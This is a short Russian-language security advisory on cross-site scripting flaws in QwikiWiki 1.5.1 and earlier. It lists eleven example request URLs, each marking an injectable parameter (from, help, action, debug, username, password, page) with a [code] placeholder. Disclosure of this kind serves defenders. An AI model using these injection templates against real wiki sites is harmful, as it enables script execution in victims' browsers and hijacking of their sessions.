Программа: QwikiWiki 1.5.1 и более ранние версии.

Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в различных
параметрах. Удаленный пользователь может с помощью специально сформированного
запроса выполнить произвольный код сценария в браузере жертвы в контексте
безопасности уязвимого сайта.

Примеры:

http://[victim]/index.php?page=Home&from=[code]
http://[victim]/index.php?page=Home&help=[code]
http://[victim]/index.php?page=Home&from=Home&help=[code]
http://[victim]/login.php?page=Home&action=Login&action=[code]&debug=1&help=true&username=1&password=1
http://[victim]/login.php?page=[code]&action=Login&action=Login&debug=1&help=true&username=1&password=1
http://[victim]/login.php?page=Home&action=Login&action=Login&debug=[code]&help=true&username=1&password=1
http://[victim]/login.php?page=Home&action=Login&action=Login&debug=1&help=[code]&username=1&password=1
http://[victim]/login.php?page=Home&action=Login&action=Login&debug=1&help=true&username=[code]&password=1
http://[victim]/login.php?page=Home&action=Login&action=Login&debug=1&help=true&username=1&password=[code]
http://[victim]/pageindex.php?nothing=nothing&help=[code]
http://[victim]/recentchanges.php?nothing=nothing&help=[code]
 



Оставить мнение